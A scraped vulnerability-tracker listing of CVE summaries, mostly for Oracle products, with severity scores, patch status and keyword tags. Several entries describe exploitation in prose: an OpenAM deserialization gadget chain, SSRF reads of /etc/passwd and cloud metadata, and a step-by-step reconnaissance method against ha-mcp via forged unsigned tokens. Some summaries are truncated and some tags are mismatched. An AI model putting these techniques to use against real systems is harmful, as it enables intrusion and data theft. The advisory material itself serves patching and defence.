CVE-2026-21975 MEDIUM This Month

Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 19.3-19.29 and 21.3-21.20. [CVSS 4.5 MEDIUM]

Oracle Java Denial Of Service Java Virtual Machine Suse
NVD
CVSS 3.1
4.5
EPSS
0.0%
CVE-2026-21974 MEDIUM This Month

Unauthenticated attackers can read sensitive data from Oracle Life Sciences Central Designer 7.0.1.0 through an easily exploitable information disclosure vulnerability accessible via HTTP. The flaw requires no user interaction or privileges, allowing remote attackers with network access to gain unauthorized access to a subset of application data. No patch is currently available for this vulnerability.

Oracle Life Sciences Central Designer
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-21973 HIGH This Week

Oracle FLEXCUBE Investor Servicing versions up to 14.5.0.15.0 contain a vulnerability that can result in unauthorized creation, deletion or modification access to critical data or all Oracle FLEXCUBE Investor Servicing accessible data (CVSS 8.1).

Oracle Flexcube Investor Servicing
NVD
CVSS 3.1
8.1
EPSS
0.1%
CVE-2026-21972 MEDIUM This Month

Oracle Configurator contains a vulnerability that can result in unauthorized read access to a subset of Oracle Configurator accessible data (CVSS 5.3).

Oracle Configurator
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-21971 MEDIUM This Month

PeopleSoft Enterprise SCM Purchasing versions up to 9.2 contain a vulnerability that can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise SCM Purchasing accessible data (CVSS 5.4).

Oracle Peoplesoft Supply Chain Management Purchasing
NVD
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-21970 MEDIUM This Month

Oracle Life Sciences Central Designer versions up to 7.0.1.0 contain a vulnerability that can result in unauthorized access to critical data or complete access to all Oracle Life Sciences Central Designer accessible data (CVSS 6.5).

Oracle Life Sciences Central Designer
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-21969 CRITICAL Act Now

Oracle Agile PLM for Process has a CVSS 9.8 vulnerability in the Supply Chain Sourcing component that allows unauthenticated remote attackers to fully compromise the system.

Oracle Agile Product Lifecycle Management For Process
NVD
CVSS 3.1
9.8
EPSS
0.2%
CVE-2026-21968 MEDIUM PATCH This Month

MySQL Server contains a vulnerability that can result in an unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server (CVSS 6.5).

Oracle MySQL Mssql Denial Of Service Mysql Server +2
NVD VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-21967 HIGH This Week

Oracle Hospitality OPERA 5 versions up to 5.6.19.23 contain a vulnerability that can result in unauthorized access to critical data or complete access to all Oracle Hospitality OPERA 5 accessible data (CVSS 8.6).

Oracle Denial Of Service Hospitality Opera 5
NVD
CVSS 3.1
8.6
EPSS
0.1%
CVE-2026-21966 MEDIUM This Month

Oracle Hospitality OPERA 5 versions up to 5.6.19.23 contain a vulnerability that can result in unauthorized update, insert or delete access to some of Oracle Hospitality OPERA 5 accessible data (CVSS 6.1).

Oracle Hospitality Opera 5
NVD
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-21965 LOW Monitor

MySQL Server contains a vulnerability that can result in an unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server (CVSS 2.7).

Oracle MySQL Mssql Denial Of Service
NVD VulDB
CVSS 3.1
2.7
EPSS
0.0%
CVE-2026-21964 MEDIUM PATCH This Month

MySQL contains a vulnerability that can result in an unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL (CVSS 4.9).

Oracle MySQL Mssql Denial Of Service Redhat +1
NVD VulDB
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-21963 MEDIUM This Month

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 6.0 MEDIUM]

Oracle Virtualbox Vm Virtualbox Suse
NVD
CVSS 3.1
6.0
EPSS
0.0%
CVE-2026-21962 CRITICAL PATCH Act Now

Oracle HTTP Server and WebLogic Server Proxy Plug-in have a CVSS 10.0 access control vulnerability allowing unauthenticated network attackers to fully compromise the middleware layer.

Oracle Apache Iis Http Server Weblogic Server Proxy Plug In
NVD GitHub
CVSS 3.1
10.0
EPSS
0.0%
CVE-2026-21961 MEDIUM This Month

Unauthenticated attackers can exploit a cross-site request forgery vulnerability in Oracle PeopleSoft Enterprise HCM Human Resources 9.2 through the Company Directory/Org Chart Viewer component to read, modify, or delete sensitive employee data via HTTP with user interaction. The vulnerability requires a victim to click a malicious link but impacts multiple PeopleSoft products and modules beyond the initial target. No patch is currently available for this medium-severity issue (CVSS 6.1).

Oracle Peoplesoft Enterprise Hcm Human Resources
NVD
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-21960 MEDIUM PATCH This Month

Oracle Applications DBA versions 12.2.3-12.2.15 contain an authorization flaw in the Java utilities component that allows high-privileged attackers to gain unauthorized read and write access to sensitive data via HTTP. An authenticated attacker with administrative credentials can exploit this vulnerability to create, modify, or delete critical application data without restriction. A patch is available and should be prioritized for deployment in affected Oracle E-Business Suite environments.

Oracle Java Applications Dba
NVD
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-21959 MEDIUM PATCH This Month

Unauthorized data disclosure in Oracle Workflow Loader (versions 12.2.3-12.2.15) allows high-privileged attackers with network access to extract sensitive information from the Oracle E-Business Suite environment. The vulnerability requires administrator-level credentials and HTTP connectivity but can result in complete exposure of workflow-accessible data. A patch is available to remediate this confidentiality issue.

Oracle Workflow
NVD
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-21957 HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 7.5 HIGH]

Oracle Virtualbox Vm Virtualbox Suse
NVD
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-21956 HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 8.2 HIGH]

Oracle Virtualbox Vm Virtualbox Suse
NVD
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-21955 HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 8.2 HIGH]

Oracle Virtualbox Vm Virtualbox Suse
NVD
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-21952 MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Parser). Supported versions that are affected are 9.0.0-9.5.0. [CVSS 4.9 MEDIUM]

Oracle MySQL Mssql Denial Of Service Mysql Server +2
NVD VulDB
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-21951 MEDIUM This Month

PeopleSoft Enterprise PeopleTools versions up to 8.60 are affected by cross-site scripting (XSS) (CVSS 6.1).

Oracle Peoplesoft Enterprise Peopletools
NVD
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-21950 MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 9.0.0-9.5.0. [CVSS 6.5 MEDIUM]

Oracle MySQL Mssql Denial Of Service Mysql Server +2
NVD VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-21949 MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 9.0.0-9.5.0. [CVSS 6.5 MEDIUM]

Oracle MySQL Mssql Denial Of Service Mysql Server +2
NVD VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-21948 MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. [CVSS 4.9 MEDIUM]

Oracle MySQL Mssql Denial Of Service Mysql Server +2
NVD VulDB
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-21947 LOW Monitor

Vulnerability in Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u471-b50. [CVSS 3.1 LOW]

Oracle Java
NVD
CVSS 3.1
3.1
EPSS
0.0%
CVE-2026-21946 MEDIUM This Month

JD Edwards EnterpriseOne Tools versions 9.2.0.0 through 9.2.26.0 are vulnerable to cross-site scripting (XSS) in the Web Runtime SEC component, allowing unauthenticated attackers to manipulate data and read sensitive information over HTTP when a user interacts with a crafted request. The CVSS vector carries a scope change, so the impact can extend to components beyond the vulnerable application. No patch is currently available.

Oracle Jd Edwards Enterpriseone Tools
NVD
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-21945 HIGH PATCH This Week

Remote denial of service in Oracle Java SE, GraalVM for JDK, and GraalVM Enterprise Edition allows unauthenticated attackers to trigger application hangs or crashes via network-accessible protocols. Affected releases include JDK 8u471, 11.0.29, 17.0.17, 21.0.9, and 25.0.1, through a flaw in the Security component. A vendor patch is available for this high-severity vulnerability.

Oracle Java Denial Of Service Jre Graalvm +4
NVD
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-21944 MEDIUM This Month

Oracle Agile Product Lifecycle Management for Process versions up to 6.2.4 are affected by cross-site scripting (XSS) (CVSS 6.5).

Oracle Agile Product Lifecycle Management For Process
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-21943 MEDIUM This Month

Reflected cross-site scripting in Oracle E-Business Suite Scripting Admin (versions 12.2.3-12.2.15) allows unauthenticated attackers to modify or read sensitive data via malicious HTTP requests that require user interaction. The CVSS vector carries a scope change, so the impact can extend beyond the vulnerable component, and no patch is listed for this entry. CVSS 6.1 (Medium) reflects low-complexity network-based exploitation with confidentiality and integrity impacts.

Oracle Scripting
NVD
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-21942 MEDIUM This Month

Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystems). Supported versions that are affected are 10 and 11. [CVSS 5.0 MEDIUM]

Oracle Denial Of Service Solaris
NVD
CVSS 3.1
5.0
EPSS
0.0%
CVE-2026-21941 MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. [CVSS 4.9 MEDIUM]

Oracle MySQL Mssql Denial Of Service Mysql Server +2
NVD VulDB
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-21940 HIGH This Week

Unauthenticated attackers can access sensitive data in Oracle Agile PLM 9.3.6 through an HTTP network request targeting the User and User Group component, potentially exposing all accessible information within the application. This easily exploitable vulnerability requires no user interaction and affects Oracle Supply Chain Products Suite deployments. No patch is currently available.

Oracle Supply Chain Products Suite
NVD
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-21939 HIGH This Week

Vulnerability in the SQLcl component of Oracle Database Server. Supported versions that are affected are 23.4.0-23.26.0. [CVSS 7.0 HIGH]

Oracle Database Server
NVD
CVSS 3.1
7.0
EPSS
0.0%
CVE-2026-21938 MEDIUM This Month

PeopleSoft Enterprise PeopleTools versions up to 8.60 contain a vulnerability that can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data (CVSS 6.1).

Oracle Peoplesoft Enterprise Peopletools
NVD
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-21937 MEDIUM PATCH This Month

MySQL Server contains a vulnerability that can result in an unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server (CVSS 4.9).

Oracle MySQL Mssql Denial Of Service Mysql Server +2
NVD VulDB
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-21936 MEDIUM PATCH This Month

MySQL Cluster contains a vulnerability that can result in an unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Cluster (CVSS 4.9).

Oracle MySQL Mssql Denial Of Service Mysql Cluster +3
NVD VulDB
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-21935 MEDIUM This Month

Oracle Solaris versions up to 11 contain a vulnerability that can result in unauthorized creation, deletion or modification access to critical data or all Oracle Solaris accessible data (CVSS 5.8).

Oracle Solaris
NVD
CVSS 3.1
5.8
EPSS
0.0%
CVE-2026-21934 MEDIUM This Month

PeopleSoft Enterprise PeopleTools versions up to 8.60 contain a vulnerability that can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data (CVSS 5.4).

Oracle Peoplesoft Enterprise Peopletools
NVD
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-21933 MEDIUM PATCH This Month

Oracle GraalVM versions up to 21.3.16 contain a vulnerability that can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data (CVSS 6.1).

Oracle Java Graalvm Graalvm For Jdk Jdk +3
NVD
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-21932 HIGH PATCH This Week

Oracle GraalVM versions up to 21.3.16 contain a vulnerability that can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data (CVSS 7.4).

Oracle Java Jre Jdk Graalvm +3
NVD
CVSS 3.1
7.4
EPSS
0.0%
CVE-2026-21931 MEDIUM This Month

Oracle APEX versions up to 23.2.0 contain a vulnerability that can result in unauthorized update, insert or delete access to some of Oracle APEX Sample Applications accessible data (CVSS 5.4).

Oracle Apex
NVD
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-21930 LOW Monitor

Sun Zfs Storage Appliance Kit versions up to 8.8.0 contain a vulnerability that allows attackers unauthorized update, insert or delete access to some of Oracle ZFS Storage Appli (CVSS 2.3).

Oracle
NVD
CVSS 3.1
2.3
EPSS
0.0%
CVE-2026-21929 MEDIUM PATCH This Month

Mysql Server contains a vulnerability that allows attackers the unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 5.3).

Oracle MySQL Mssql Denial Of Service Mysql Server +2
NVD VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-21928 MEDIUM This Month

Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. [CVSS 5.3 MEDIUM]

Oracle Linux Solaris
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-21927 MEDIUM This Month

Solaris versions up to 10 contain a vulnerability that allows attackers unauthorized creation, deletion or modification access to critical data or all O (CVSS 5.8).

Oracle Solaris
NVD
CVSS 3.1
5.8
EPSS
0.0%
CVE-2026-21926 HIGH This Week

Siebel Customer Relationship Management Deployment contains a vulnerability that allows attackers the unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 7.5).

Oracle Tls Denial Of Service Siebel Customer Relationship Management Deployment
NVD
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-21925 MEDIUM PATCH This Month

Graalvm versions up to 21.3.16 contain a vulnerability that allows attackers unauthorized update, insert or delete access to some of Oracle Java SE, Oracle G (CVSS 4.8).

Oracle Java Jre Graalvm Graalvm For Jdk +3
NVD
CVSS 3.1
4.8
EPSS
0.0%
CVE-2026-21924 MEDIUM This Month

Utilities Framework versions up to 4.3.0.3.0 contain a vulnerability that allows attackers unauthorized update, insert or delete access to some of Oracle Utilities Applica (CVSS 5.4).

Oracle Utilities Framework
NVD
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-21923 MEDIUM This Month

Life Sciences Central Designer versions up to 7.0.1.0 contain a vulnerability that allows attackers unauthorized update, insert or delete access to some of Oracle Life Sciences Cen (CVSS 6.5).

Oracle Life Sciences Central Designer
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-21922 MEDIUM This Month

Planning And Budgeting Cloud Service contains a vulnerability that allows attackers unauthorized creation, deletion or modification access to critical data or all O (CVSS 4.2).

Oracle Planning And Budgeting Cloud Service
NVD
CVSS 3.1
4.2
EPSS
0.0%
CVE-2025-34337 HIGH This Month

eGovFramework/egovframe-common-components versions up to and including 4.3.1 includes Web Editor image upload and related file delivery functionality that uses symmetric encryption to protect URL. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

Oracle Authentication Bypass
NVD GitHub
CVSS 4.0
8.7
EPSS
0.1%
CVE-2025-10703 HIGH This Month

Improper Control of Generation of Code ('Code Injection') vulnerability in Progress DataDirect Connect for JDBC drivers, Progress DataDirect Open Access JDBC driver and Hybrid Data Pipeline allows. Rated high severity (CVSS 8.6), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

Docker Oracle Apache Google Sap +5
NVD
CVSS 4.0
8.6
EPSS
0.4%
CVE-2025-10702 HIGH This Month

Improper Control of Generation of Code ('Code Injection') vulnerability in Progress DataDirect Connect for JDBC drivers, Progress DataDirect Open Access JDBC driver and Hybrid Data Pipeline allows. Rated high severity (CVSS 8.6), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

Docker Oracle Apache Google Sap +4
NVD
CVSS 4.0
8.6
EPSS
0.4%
CVE-2025-64164 HIGH POC PATCH This Week

Dataease is an open source data visualization analysis tool. Rated high severity (CVSS 8.9), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.

Deserialization Oracle Java Dataease
NVD GitHub
CVSS 4.0
8.9
EPSS
0.1%
CVE-2023-53564 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix defrag path triggering jbd2 ASSERT code path: ocfs2_ioctl_move_extents ocfs2_move_extents ocfs2_defrag_extent __ocfs2_move_extent + ocfs2_journal_access_di ...

Denial Of Service Linux Oracle Redhat Suse +1
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2025-36758 MEDIUM This Month

It is possible to bypass the clipping level of authentication attempts in SolaX Cloud through the use of the 'Forgot Password' functionality as an oracle. Rated medium severity (CVSS 6.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

Authentication Bypass Oracle
NVD
CVSS 4.0
6.3
EPSS
0.1%
CVE-2025-7383 MEDIUM This Month

Padding oracle attack vulnerability in Oberon microsystem AG's Oberon PSA Crypto library in all versions since 1.0.0 and prior to 1.5.1 allows an attacker to recover plaintexts via timing. Rated medium severity (CVSS 5.9), this vulnerability requires no authentication. No vendor patch available.

Oracle Information Disclosure
NVD
CVSS 4.0
5.9
EPSS
0.0%
CVE-2026-33439
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

Remote code execution in OpenIdentityPlatform OpenAM 16.0.5 and earlier allows unauthenticated attackers to execute arbitrary OS commands via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypass exploits an unpatched deserialization sink in JATO's ClientSession.deserializeAttributes() that was overlooked when CVE-2021-35464 was mitigated. Attackers can target any JATO ViewBean endpoint with <jato:form> tags (commonly found in password reset pages) using a PriorityQueue→TemplatesImpl gadget chain with libraries bundled in OpenAM's WAR file. Vendor-released patch available in version 16.0.6 (GitHub commit 014007c). No public exploit code identified at time of analysis, but detailed technical writeup with gadget chain specifics has been published.

Deserialization RCE Java +5
NVD GitHub
CVE-2026-35187
EPSS 0% CVSS 7.7
HIGH This Week

Server-Side Request Forgery in pyLoad-ng allows authenticated users with ADD permissions to read local files via file:// protocol, access internal network services, and exfiltrate cloud metadata. The parse_urls API endpoint fetches arbitrary URLs without protocol validation, enabling attackers to read /etc/passwd, configuration files, SQLite databases, and AWS/GCP metadata endpoints at 169.254.169.254. Error-based responses create a file existence oracle. Multi-protocol support (file://, gopher://, dict://) escalates impact beyond standard HTTP SSRF. CVSS 7.7 reflects network attack vector, low complexity, and scope change with high confidentiality impact. No public exploit code identified at time of analysis, though detailed proof-of-concept included in advisory demonstrates exploitation via curl commands against Docker deployments.

SSRF Docker Redis +3
NVD GitHub
CVE-2026-34595
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Parse Server versions prior to 8.6.70 and 9.7.0-alpha.18 allow authenticated users with find class-level permissions to bypass protectedFields restrictions on LiveQuery subscriptions by submitting array-like objects with numeric keys instead of proper arrays in $or, $and, or $nor operators. This enables information disclosure through a binary oracle attack that reveals whether protected fields match attacker-supplied values. The vulnerability requires prior authentication and find-level access but no user interaction, affecting all deployments of vulnerable Parse Server versions.

Node.js Authentication Bypass Memory Corruption +1
NVD GitHub
CVE-2026-21713
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Node.js versions 20.x, 22.x, 24.x, and 25.x use non-constant-time comparison for HMAC signature verification, allowing remote attackers to infer valid HMAC values through timing oracle attacks. The vulnerability leaks information proportional to matching bytes and requires high-resolution timing measurement capability, making exploitation feasible in controlled network conditions. CVSS 5.9 (confidentiality impact only); no public exploit identified at time of analysis.

Node.js Information Disclosure Oracle +1
NVD
CVE-2026-27856
EPSS 0% CVSS 7.4
HIGH PATCH This Week

OX Dovecot Pro's doveadm HTTP service is vulnerable to timing oracle attacks during credential verification, allowing remote unauthenticated attackers to enumerate valid credentials through timing analysis and gain full administrative access to the doveadm management interface. The vulnerability affects OX Dovecot Pro installations with exposed doveadm HTTP service ports, carries a CVSS score of 7.4, and has no public exploit identified at time of analysis.

Oracle Authentication Bypass Redhat
NVD VulDB
CVE-2026-33763
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

AVideo password verification API endpoint allows unauthenticated attackers to brute-force video access passwords at network speed with no rate limiting, enabling compromise of password-protected video content across the platform. The vulnerable endpoint pkg:composer/wwbn_avideo returns a boolean confirmation for any password guess without authentication, CAPTCHA, or throttling mechanisms, combined with plaintext password storage and loose equality comparison that further weakens defenses. Publicly available exploit code exists demonstrating rapid password enumeration against any video ID.

PHP Information Disclosure Oracle
NVD GitHub
CVE-2026-33429
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

An information disclosure vulnerability in Parse Server's LiveQuery functionality allows attackers to infer the values of protected fields by monitoring whether update events are generated when those fields change, effectively creating a binary oracle that reveals field modifications despite the field values themselves being stripped from event payloads. The vulnerability affects Parse Server npm package across multiple versions, and while no public exploit code or active exploitation has been documented, the attack requires only standard subscription capabilities without elevated privileges. The vendor has released patches that validate the watch parameter against protected fields at subscription time, mirroring existing where clause protections.

Information Disclosure Oracle
NVD GitHub VulDB
CVE-2026-32935
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

phpseclib versions 1.0.26 and below, 2.0.0 through 2.0.51, and 3.0.0 through 3.0.49 are vulnerable to a padding oracle timing attack when using AES in CBC mode, allowing attackers to decrypt sensitive data through cryptanalysis of response timing differences. This information disclosure vulnerability affects any PHP application using the vulnerable phpseclib library for AES-CBC encryption. Although no CVSS score, EPSS data, or confirmed active exploitation (KEV status) are currently available, the presence of a verified fix and security advisory indicates this is a legitimate cryptographic weakness requiring attention.

PHP Oracle Information Disclosure
NVD GitHub VulDB
CVE-2026-21992
EPSS 0% CVSS 9.8
CRITICAL POC Act Now

A critical authentication bypass vulnerability in Oracle Identity Manager and Oracle Web Services Manager allows remote attackers to completely compromise affected systems without any credentials. The vulnerability resides in the REST WebServices and Web Services Security components, affecting versions 12.2.1.4.0 and 14.1.2.1.0 of both products. With a CVSS score of 9.8 and no authentication required, this represents a severe risk to identity management infrastructure, though no current KEV listing or public POC has been documented in available sources.

Oracle Authentication Bypass
NVD VulDB
CVE-2026-33292
EPSS 0% CVSS 7.5
HIGH This Week

Unauthenticated attackers can stream any private or paid video in PHP, Oracle, and Apple applications through a path traversal vulnerability in the HLS streaming endpoint. The flaw exploits a split-oracle condition where authorization validation and file access use different parsing logic on the videoDirectory parameter, allowing attackers to bypass authentication checks while accessing unauthorized content. No patch is currently available for this high-severity vulnerability.

PHP Path Traversal Oracle +1
NVD GitHub
CVE-2026-21994
EPSS 0% CVSS 9.8
CRITICAL Act Now

This is a critical unauthenticated remote code execution vulnerability in Oracle Edge Cloud Infrastructure Designer and Visualisation Toolkit version 0.3.0. An attacker with network access via HTTP can completely take over the affected system without any authentication, privileges, or user interaction required. The CVSS score of 9.8 reflects maximum impact across confidentiality, integrity, and availability. There is no evidence of active exploitation (not in CISA KEV), and no proof-of-concept code has been publicly identified in the available intelligence.

Oracle Authentication Bypass
NVD VulDB
CVE-2026-4258
EPSS 0% CVSS 7.5
HIGH PATCH This Week

A cryptographic vulnerability in the Stanford Javascript Crypto Library (SJCL) allows attackers to recover victims' ECDH private keys through a missing point-on-curve validation flaw. The vulnerability affects all versions of SJCL and enables remote attackers to send specially crafted off-curve public keys and observe ECDH outputs to extract private key material. A proof-of-concept exploit is publicly available, though the vulnerability is not currently listed in CISA KEV and has no EPSS score assigned yet.

Information Disclosure Oracle Jwt Attack +2
NVD GitHub VulDB
CVE-2026-28490
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

Authlib's implementation of the JWE RSA1_5 key management algorithm contains a padding oracle vulnerability that leaks decryption failures through timing and exception patterns, allowing attackers to decrypt sensitive data without the private key. The library disabled the constant-time protections provided by the underlying cryptography library and raises exceptions before tag validation completes, creating a reliable side-channel. Public exploit code exists for this vulnerability affecting Authlib users in Python and related Oracle products.

Oracle Python RCE +2
NVD GitHub VulDB
CVE-2026-32111
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

The ha-mcp OAuth consent form (beta feature) accepts a user-supplied `ha_url` and makes a server-side HTTP request to `{ha_url}/api/config` with no URL validation. An unauthenticated attacker can submit arbitrary URLs to perform internal network reconnaissance via an error oracle. Two additional code paths in OAuth tool calls (REST and WebSocket) are affected by the same primitive. The primary deployment method (private URL with pre-configured `HOMEASSISTANT_TOKEN`) is not affected.

**Code path 1 - Consent form validation** (reported)

When a user submits the OAuth consent form, `_validate_ha_credentials()` (`provider.py`) makes a server-side GET request to `{ha_url}/api/config` with no scheme, IP, or domain validation. Different exception types produce distinct error messages, creating an error oracle:

| Outcome | Message returned | Information leaked |
|---------|------------------|--------------------|
| `ConnectError` | "Could not connect..." | Host down or port closed |
| `TimeoutException` | "Connection timed out..." | Host up, port filtered |
| HTTP 401 | "Invalid access token..." | Service alive, requires auth |
| HTTP 403 | "Access forbidden..." | Service alive, forbidden |
| HTTP ≥ 400 | "Failed to connect: HTTP {N}" | Service alive, exact status |

An attacker can drive the flow programmatically: register a client via open DCR (`POST /register`), initiate authorization, extract a `txn_id`, and submit arbitrary `ha_url` values. No user interaction required.

**Code path 2 - REST tool calls with forged token**

OAuth access tokens are stateless base64-encoded JSON payloads (`{"ha_url": "...", "ha_token": "..."}`). Since tokens are not signed, an attacker can forge a token with an arbitrary `ha_url`. REST tool calls then make HTTP requests to hardcoded HA API paths on that host (`/config`, `/states`, `/services`, etc.). JSON responses are returned to the caller.

In practice, path control is limited - most endpoints use absolute paths that ignore the `ha_url` path component. Useful exfiltration requires the target to return JSON at HA API paths, which is unlikely for non-HA services.

**Code path 3 - WebSocket tool calls with forged token**

The same forged token triggers WebSocket connections to `ws://{ha_url}/api/websocket`. The client follows the HA WebSocket handshake protocol (waits for `auth_required`, sends `auth`, expects `auth_ok`). Non-HA targets fail at the protocol level and return nothing useful. Realistic exploitation is limited to pivoting to another HA instance on the internal network.

**Confirmed:** Internal network reconnaissance via error oracle (all 3 code paths). An attacker can map reachable hosts and open ports from the server's network position.

OAuth mode is a **beta** feature, documented separately in `docs/OAUTH.md` and not part of the main setup instructions. The standard deployment method (pre-configured `HOMEASSISTANT_URL` and `HOMEASSISTANT_TOKEN`) is not affected. Upgrade to 7.0.0.

Oracle SSRF Home Assistant Mcp Server
NVD GitHub VulDB
CVE-2026-21990
EPSS 0% CVSS 8.2
HIGH This Week

Vm Virtualbox versions up to 7.1.14 contain a vulnerability that allows attackers to take over Oracle VM VirtualBox (CVSS 8.2).

Oracle Virtualbox Vm Virtualbox
NVD
CVE-2026-21989
EPSS 0% CVSS 8.1
HIGH This Week

Vm Virtualbox versions up to 7.1.14 contain a vulnerability that allows attackers unauthorized creation, deletion or modification access to critical data or all O (CVSS 8.1).

Oracle Virtualbox Denial Of Service +1
NVD
CVE-2026-21988
EPSS 0% CVSS 8.2
HIGH This Week

Vm Virtualbox versions up to 7.1.14 contain a vulnerability that allows attackers to take over Oracle VM VirtualBox (CVSS 8.2).

Oracle Virtualbox Vm Virtualbox
NVD
CVE-2026-21987
EPSS 0% CVSS 8.2
HIGH This Week

Vm Virtualbox versions up to 7.1.14 contain a vulnerability that allows attackers to take over Oracle VM VirtualBox (CVSS 8.2).

Oracle Virtualbox Vm Virtualbox
NVD
CVE-2026-21986
EPSS 0% CVSS 7.1
HIGH This Week

Vm Virtualbox versions up to 7.1.14 contain a vulnerability that allows attackers the unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 7.1).

Oracle Windows Virtualbox +2
NVD
CVE-2026-21985
EPSS 0% CVSS 6.0
MEDIUM This Month

Vm Virtualbox versions up to 7.1.14 contain a vulnerability that allows attackers unauthorized access to critical data or complete access to all Oracle VM Virtual (CVSS 6.0).

Oracle Virtualbox Vm Virtualbox +1
NVD
CVE-2026-21984
EPSS 0% CVSS 7.5
HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 7.5 HIGH]

Oracle Virtualbox Vm Virtualbox +1
NVD
CVE-2026-21983
EPSS 0% CVSS 7.5
HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 7.5 HIGH]

Oracle Virtualbox Vm Virtualbox +1
NVD
CVE-2026-21982
EPSS 0% CVSS 7.5
HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 7.5 HIGH]

Oracle Virtualbox Vm Virtualbox
NVD
CVE-2026-21981
EPSS 0% CVSS 4.6
MEDIUM This Month

